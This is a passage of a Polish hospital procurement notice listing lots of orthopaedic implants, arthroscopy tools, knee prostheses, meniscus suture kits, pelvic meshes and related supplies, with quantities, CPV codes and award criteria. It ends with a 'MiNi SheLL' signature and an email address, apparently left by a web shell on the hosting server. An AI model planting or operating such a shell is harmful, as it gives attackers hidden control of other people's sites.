podtrzymujacym nastawienie kosci o szerokosci 0-7mmPłyta o kształcie koniczyny 2 i 4 otwory -płyta o długosci 38, 45 i 64mm	Szt.	6	Płytka o kształcie anatomicznym do korekcji palucha sztywnego - typu VA LCP blokująco - kompresyjna zmiennokątowa do złamań i rekonstrukcji w obrębiekości stopy i śródstopia w tym korekcji palucha sztywnego, Płyty wyposażone w otwory zbudowane z czterech kolumn gwintowanych z min. czterema zwojami gwintu z możliwością zastosowania śrub blokowanych zmiennokątowo z odchyleniem od osi w każdym kierunku 15stopni.W częsci trzonowej płyty otwory gwintowane lub dwubiegunowe z możliwością użycia śrub korowych i blokowanych (w tym zmiennokątowych). Śruby blokujące ze stożkowym gwintem na główce wkręcane za pomocą śrubokręta dynamometrycznego 0,8/1,2Nm. W części środkowej płyta wyposażona w dwa specjalne otwory w tym jeden podłużny przeznaczone do kompresji z wykorzystaniem kompresyjnych drutów Kirschnera oraz szczypiec kompresyjnych. Możliwość zastosowania śrub blokowanych w płycie 2.4/2.7 wprowadzanych w osi otworów w głowie płyty. Śruby blokowane w płycie samogwintujące z gniazdami gwiazdkowymi. Instrumentarium wyposażone w specjalne narzędzia do kompresji z drutami kompresyjnymi oraz rozwiertaki kuliste wklęsłe i wypukłe do przygotowania przed fuzją powierzchni stawowych. Materiał stal /tytan.Płyty anatomiczne MTP - płyty w rozmiarach małym,średnim (zgięcie grzbietowe 0, 5 i 10 stopni) oraz dużym ( zgięcie grzbietowe 5 stopni), długość 42, 52 i 57mm Płyty anatomiczne MTP - płyty w wersji rewizyjnej (zgięcie grzbietowe 0 stopni), długość 53 mm.	Szt.	6	Płytka o kształcie anatomicznym do korekcji palucha koślawego w obrębie stawu stępowo-śródstopnego - typu VA LCP blokująco - kompresyjnazmiennokątowa do złamań i rekonstrukcji w obrębie kości stopy i śródstopia w tym korekcji palucha koślawego, Płyty wyposażone w otwory zbudowane z czterech kolumn gwintowanych z min. czterema zwojami gwintu z możliwością zastosowania śrub blokowanych zmiennokątowo z odchyleniem od osi w każdym kierunku 15stopni.W częsci trzonowej płyty otwory gwintowane lub dwubiegunowe z możliwością użycia śrub korowych i blokowanych (w tym zmiennokątowych). Śruby blokujące ze stożkowym gwintem na główce wkręcane za pomocą śrubokręta dynamometrycznego 0,8/1,2Nm. W części środkowej płyta wyposażona w dwa specjalne otwory w tym jeden podłużny przeznaczone do kompresji z wykorzystaniem kompresyjnych drutów Kirschnera oraz szczypiec kompresyjnych. Możliwość zastosowania śrub blokowanych w płycie 2.4/2.7 wprowadzanych w osi otworów w głowie płyty. Śruby blokowane w płycie samogwintujące z gniazdami gwiazdkowymi. Instrumentarium wyposażone w specjalne narzędzia do kompresji z drutami kompresyjnymi. Materiał stal /tytan. Płyty anatomiczne TMT - płyty w rozmiarach krótkim, długim, oraz typu T o długościach 39,43 i 48 mm	Szt.	6	Stalowe śruby korowe samogwintujace o średnicy 2,7mm i długościach 10-40mm, stal Szt.	50	Stalowe śruby blokowane zmiennkątowe +/- 15 stopni, samogwintujace o średnicy 2,7mm i długościach 10-60mm, stal Szt.	70<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33184100-4, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>OSTRZA I FREZY DO ARTROSKOPII KOLANA I BARKU</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Ostrze do artroskopii barku jednorazowe pakowane po 5 szt.AGRESSIVE PLUSlub równowazne	Szt.	52.	Ostrze do artroskopii barku jednorazowe pakowane po 5szt.TOMCAT lub równowazne	Szt. 53.	Ostrza do artroskopii kolana jednorazowe pakowane po 5sztAGRESSIVE PLUSlub równoważne	Szt.	604.	Ostrza do artroskopii kolana jednorazowe pakowane po 5sztRESECTORlub równoważne	Szt. 255.	Ostrza do artroskopii kolana jednorazowe pakowane po 5sztTOMCAT lub równoważne	Szt. 506.	Frezy do artroskopii jednorazowe pakowane po 5sztROUND BURS(12 FLUTE) lub równoważne	Szt. 157.	Frezy do artroskopii jednorazowe pakowane po 5sztBARREL BURS(12 FLUTE) lub równoważne	Szt. 158.	Frezy do mikrozłamań jednorazowy pakowany po 5sztSUBCHONDRAL DRILL lub równoważne	Szt. 15<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33169000-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>ENDOPROTEZA JEDNOPRZEDZIAŁOWA STAWU KOLANOWEGO </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Endoproteza jednoprzedziałowa stawu kolanowego cementowa w wersji przyśrodkowej i bocznej	Kpl.	28	Część udowa, piszczelowa anatomiczna, wkładka polietylenowa anatomiczna niezwiązana z komponentem piszczelowym- ruchoma wkładka 2.	Endoproteza jednoprzedziałowa stawu kolanowego bezcementowa Kpl.	3	Część udowa bezcementowa, piszczelowa bezcementowa anatomiczna, wkładka polietylenowa anatomiczna niezwiązana z komponentem piszczelowym- ruchoma wkładka 3. Ostrze oscylacyjne i posuwisto zwrotne	Szt.	624.	Ostrze półkolite, łódeczkowe pod kil piszczeli	Szt.	55.	Cement kostny z Gentamycyną 1x40g Szt.	306.	Zestaw do próżniowego mieszania cementu, pojedynczy	Szt.	307.	Cement kostny z gentamycyną i klindamycyną 40g	Szt.	308	System do płukania kości	Szt.	20<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33183200-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>ENDOPROTEZA STAWU KOLANOWEGO </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Część udowa anatomiczna - prawa/ lewa. Dostępna w 8 rozmiarach dla każdej ze stron, z zachowaniem lub usunięciem więzadła PCL, wykonana ze stopu kobalt-chrom, z możliwością użycia podkładek dystalnych, posterior	Szt.	502	Część udowa anatomiczna - prawa/ lewa. Dostępna w 8 rozmiarach dla każdej ze stron, z zachowaniem lub usunięciem więzadła PCL, wykonana ze stopu metalu (ZrNb), którego zewnętrzna warstwa jest przekształcona w ceramikę; przeznaczona dla pacjentów uczulonych na metal	Szt.	53	Wkładka uniwersalna, polietylenowa:-w wersji CR lub CR pogłębionej o wysokościach 9, 11, 13, 15, 18, 21 mm sterylizowana EtO- przystosowana do tylnej stabilizacji o wysokościach 9, 11, 13, 15, 18, 21, 25 mm sterylizowana EtO	Szt.	504	Taca piszczelowa tytanowa anatomiczna - prawa/lewa, dostępna w 8 rozmiarach dla każdej ze stron, gładko polerowana ze specjalnym mechanizmem zatrzaskowym, z możliwością rozbudowy o trzpień i połowiczą podkładkę	Szt.	505	Rzepka cementowa, polietylenowa w czterech rozmiarach, metalowy pierścień RTG	Szt.	36	Trzpień tytanowy piszczelowy o długości 100mm w średnicach od 10 do 24mm	Szt.	47	Podkładki tytanowe piszczelowe połowicze o grubości 10 i 15mm.	Szt.	68	Ostrze jednorazowe do stosowanego napędu	Szt.	509	Cement z antybiotykiem 1x40 g	Szt.	5010	Jednorazowe końcówki do pulsacyjnego oczyszczania kości	Szt.	5011	Zestaw do próżniowego mieszania cementu	Szt.	50<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33183200-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>ZESTAW DO SZYCIA ŁĄKOTEK</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Wielorazowy zestaw narzędzi-dwururek do szycia łąkotki, techniką ,,inside-out"zawierający: dwururka zagieta w górę i prawo, dwururka zagięta w górę i w lewo, dwururka prosta, dwururka zagieta góra i dół, dwururka zagięta lewo i prawo, pojedyncza kaniula, nasadka tuleja do przechwytywania, urządzenie do zaginania dwururek oraz taca do sterylizacji	Kpl.	12.	Sterylna igła z oczkiem do szycia łąkotki, kompatybilna z zestawem z pozycji nr 1( w opakowaniu 6 szt.)	Szt.	243.	Jednorazowe 2 sterylne igły połączone ze sobą niewchłanialną nicią 2.	Szt.	104.	Nici polietylenowe, grubość 2 o podwyższonej wytrzymałości, sterylne pakowane pojedynczo	Szt.	245.	Zestaw do szycia łąkotek pozwalający na szycie techniką ALL INSIDE. . System składający się z dwóch implantów PEEK, połączonych za pomocą polietylenowego, niewchłanialnego wzmocnionego szwu 2-0. szew posiada samozaciskowy węzeł umożliwiający zmniejszenie dystansu pomiędzy implantami, . Implanty załadowane są rzędowo w pojedynczą półotwartą jednorazową igłę.. igła z podziałką posiada regulowany ogranicznik zabezpieczający jej zbyt głębokie wbicie w łąkotkę. Igła wypychana za pomocą spustu na rękojeści. Kąty zagięcia igieł 0, 12, 27 stopni	Szt.	156.	Obcinacz nici oraz spychacz węzłów wraz z dołączoną kaniulą do prowadzenia igły. Prosty. Szt.	10<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33162000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>6</td><td><b>Nazwa: </b></td><td>MEMBRANY</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Membrana posiadająca rejestracje w leczeniu ubytków chrzęstnych oraz chrzęstno-kostnych, stanowiąca podłoże dla mezenchymalnych komórek macierzystych ludzkiego szpiku kostnego, zbudowana z kwasu hialuronowego. Wymiary membrany 2 x 2 cm, grubość 2 mm, czas biodegradacji do 24 tygodni. Brak określonej lewej i prawej strony.Przy leczeniu ubytków ogniskowych ( ubytków otoczonych granicą zdrowej chrząstki) zgodnie z IFU nie wymaga dodatkowej fiksacji.	Szt.	10<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33162000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>7</td><td><b>Nazwa: </b></td><td>TAŚMA DO OPERACYJNEGO LECZENIA WYSIŁKOWEGO NIETRZYMANIA MOCZU</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Makroporowata monofilamentowa polipropylenowa taśma w koszulce do operacyjnego leczenia wysiłowego nietrzymania moczu u kobiet.Wymagania:- szerokość 1,2 cm- długość 45 cm- grubość nici 120um- gramatura 63g/m2- grubość siatki 0,46mm- wielkość porów 0,23 mm2.Taśma posiada wplecioną niebieska nić oraz jest zakończona długimi wąsami ułatwiającymi implantację	Szt. 202.	Użyczenie narzędzi do implantacji taśm na cały okres obowiązywania umowy	Kpl.	2<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33169000-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>8</td><td><b>Nazwa: </b></td><td>SIATKA DO PLASTYK CYSTOCELE I RECTOCELE</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Jednorazowy zestaw do korekcji cystocele, składający się z: - siatki wykonanej z polipropylenu monofilamentowego o kształcie anatomicznym o wymiarach 50x65 mm, z podwójnymi ramionami z kazdego boku do przeprowadzenia przez otwory zasłonowe( double TOT), o wielkości oczek 1,06x1,01mm, grubość 0,33mm i gramaturze max. 28g/m2- jednego jednorazowego narzedzia do zakładania siatki metodą przezzasłonową techniką ,,out-in"	Szt.	402.	Jednorazowy zestaw do korekcji rectocele, składający się z: - siatki wykonanej z polipropylenu monofilamentowego o kształcie anatomicznym o wymiarach 40x140 mm, z pojedynczymi ramionami z kazdego boku do przeprowadzenia przez pośladki, o wielkości oczek 1,06x1,01mm, grubość 0,33mm i gramaturze max. 28g/m2- jednego jednorazowego narzedzia do zakładania siatki metodą przez pośladki z uszkiem do mocowania ramion	Szt.	12<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33169000-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>9</td><td><b>Nazwa: </b></td><td>PROWADNICA NITINOLOWA</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Prowadnica nitinolowa sterylna Suture Passer Needle do przeszywacza tkankowego Qautro GT Cayenne Medical nr kat. CM - 9011 lub równoważny	Szt.	20<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33162000-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com